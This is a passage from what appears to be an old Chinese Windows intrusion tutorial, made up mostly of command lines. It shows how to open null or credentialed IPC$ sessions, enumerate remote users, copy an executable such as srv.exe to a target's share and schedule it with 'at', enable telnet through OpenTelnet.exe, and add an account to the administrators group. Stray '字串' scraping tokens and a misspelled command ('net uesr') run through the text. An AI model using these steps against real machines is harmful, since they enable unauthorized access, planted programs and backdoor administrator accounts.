1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成; 字串8
2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成; 字串2
3 运行/关闭远程主机的服务,需要在shell下完成;
字串8
4 启动/杀掉远程主机的进程,也需要在shell下完成。
十一 入侵中可能会用到的相关命令
字串5
请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
字串3
1 建立空连接:
net use \\IP\ipc$ "" /user:""
字串6
2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP
4 查看本地主机的共享资源(可以看到本地的默认共享)
net share 字串2
5 得到远程主机的用户名列表
nbtstat -A IP
6 得到本地主机的用户列表
net user 字串5
7 查看远程主机的当前时间
net time \\IP
8 显示本地主机当前服务
net start
9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y 字串8
10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
字串9
11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部 字串1
12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内 字串3
13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求: 字串4
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90 字串1
15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add 字串3
16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator "" 字串8
17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del
字串9